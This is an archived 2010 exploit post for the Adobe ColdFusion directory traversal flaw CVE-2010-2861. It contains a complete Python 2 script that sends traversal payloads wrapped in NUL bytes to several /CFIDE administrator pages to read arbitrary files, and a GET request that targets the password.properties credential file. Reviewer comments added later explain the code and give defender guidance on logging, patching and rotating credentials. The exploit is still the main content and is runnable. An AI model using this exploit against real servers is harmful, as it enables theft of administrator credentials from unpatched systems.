
Adobe ColdFusion Directory Traversal Vulnerability

Posted on 14 August 2010

# ==================================================
# Adobe ColdFusion Directory Traversal Vulnerability
# ==================================================
# Working GET request courtesy of carnal0wnage:
# http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
#
#
#!/usr/bin/python

# CVE-2010-2861 - Adobe ColdFusion Unspecified Directory Traversal Vulnerability
# detailed information about the exploitation of this vulnerability:
# http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/

# leo 13.08.2010
#
# NOTE(review): this listing was recovered from an archived HTML page that had
# collapsed the script onto two lines and HTML-escaped its quotes and angle
# brackets. Line breaks and indentation below are reconstructed, and the code
# is Python 2 (print statements).
#
# Defender summary, based only on what this script sends:
#   * Requests target the ColdFusion administrator/wizard pages listed in
#     `filenames`, with a `locale` form field carrying a relative path wrapped
#     in URL-encoded NUL bytes (%00).
#   * The script uses POST, so the `locale` value travels in the request body.
#     Access logs that record only the request line will show the target path
#     but not the traversal string; body-aware inspection (WAF, reverse proxy,
#     full request capture) is needed to see it. The GET variant quoted above
#     puts the same value in the query string, where ordinary access logs do
#     capture it.
#   * Mitigation is the vendor fix for CVE-2010-2861, plus keeping /CFIDE
#     administrative paths unreachable from untrusted networks. If the
#     password.properties file named in the usage text may have been read,
#     treat the administrator credential as exposed and rotate it.

import sys
import socket
import re

# in case some directories are blocked
# Each entry is tried in turn by main(); all of them are paths under /CFIDE
# (one spelled lower-case), which is the list defenders should match on.
filenames = ("/CFIDE/wizards/common/_logintowizard.cfm", "/CFIDE/administrator/archives/index.cfm", "/cfide/install.cfm", "/CFIDE/administrator/entman/index.cfm")

# Raw HTTP request template. Placeholders, in order: request path, Host header,
# Content-Length, and the user-supplied relative file path. `%%00` renders as a
# literal "%00" (URL-encoded NUL) on either side of the path.
# NOTE(review): the archived page lost this literal's line breaks; the
# header-per-line layout and the blank line before the body are reconstructed.
post = """POST %s HTTP/1.1
Host: %s
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: %d

locale=%%00%s%%00a"""

def main():
    """Send the templated POST to each path in `filenames` and print the
    <title> element of each response.

    Command-line arguments: host, port, file_path. Prints usage and returns
    when the argument count is not exactly three.
    """
    if len(sys.argv) != 4:
        print "usage: %s <host> <port> <file_path>" % sys.argv[0]
        print "example: %s localhost 80 ../../../../../../../lib/password.properties" % sys.argv[0]
        print "if successful, the file will be printed"
        return

    host = sys.argv[1]
    port = sys.argv[2]
    path = sys.argv[3]

    for f in filenames:
        print "------------------------------"
        print "trying", f

        # One fresh TCP connection per candidate path; the request asks for
        # "Connection: close", so the read loop below ends when the server
        # closes the connection.
        # NOTE(review): the socket is never closed explicitly and no timeout
        # is set.
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, int(port)))
        # 14 is the length of the fixed body text around the path:
        # "locale=%00" (10 characters) plus "%00a" (4 characters).
        s.send(post % (f, host, len(path) + 14, path))

        # Read the whole response until the peer closes the connection.
        buf = ""
        while 1:
            buf_s = s.recv(1024)
            if len(buf_s) == 0:
                break
            buf += buf_s

        # The script reports whatever sits between <title> and </title> in the
        # response; per the usage text, that is where the requested file's
        # content is expected to appear on a vulnerable server. re.S lets the
        # match span multiple lines.
        m = re.search('<title>(.*)</title>', buf, re.S)
        if m != None:
            # `title` is assigned but never read; the print below re-evaluates
            # the same expression.
            title = m.groups(0)[0]
            print "title from server in %s:" % f
            print "------------------------------"
            print m.groups(0)[0]
            print "------------------------------"

if __name__ == '__main__':
    main()

# Inj3ct0r.com (http://inj3ct0r.com/) [2010-08-14]

 
